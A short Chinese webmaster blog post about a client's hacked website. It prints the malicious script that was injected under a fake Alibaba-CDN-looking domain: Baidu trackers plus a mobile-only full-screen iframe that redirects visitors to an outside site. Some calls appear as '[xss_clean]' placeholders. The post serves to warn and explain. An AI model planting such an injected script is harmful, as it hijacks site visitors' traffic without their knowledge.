今天给有个客户网站被黑了给客户做网站安全修复
<script src="//img-alicdn.com/js-sdk-pro.min.js"></script>
这个代码 我前前后后看了10遍都没去想他是个恶意代码 都以为是阿里云的CDN
点开一看 傻眼了
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?e4a421e7639148192956b1741402a0e2";
var s = document.getElementsByTagName("script")[0];
s[xss_clean].insertBefore(hm, s);
})();
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?bf858790cc1b5bf72311717faa002bb1";
var s = document.getElementsByTagName("script")[0];
s[xss_clean].insertBefore(hm, s);
})();
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?983e51308ea0b41d540ae109dd018fed";
var s = document.getElementsByTagName("script")[0];
s[xss_clean].insertBefore(hm, s);
})();
function isMobile() {
let flag = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
return flag;
}
function toPage(){
if (isMobile()) {
var strUrl = "https://340224555310.cc/";
[xss_clean]('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
[xss_clean]('<style>html,body{widht:100%;height:100%;overflow:hidden; clear:both;}</style>');
[xss_clean]('<div style="width:100%;height:100%;position:fixed;top:0;left:0;z-index:2147483647;background:#fff">');
[xss_clean]('<iframe src=' +strUrl+' frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
[xss_clean]('</div>');
// location.href = "https://com";
}else{
}
}
toPage();
如果您的问题还未解决可以联系站长付费协助。
有问题可以加入技术QQ群一起交流学习
本站vip会员 请加入无忧模板网 VIP群(50604020) PS:加入时备注用户名或昵称
普通注册会员或访客 请加入无忧模板网 技术交流群(50604130)
客服微信号:15898888535
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若内容侵犯了原著者的合法权益,可联系站长删除。
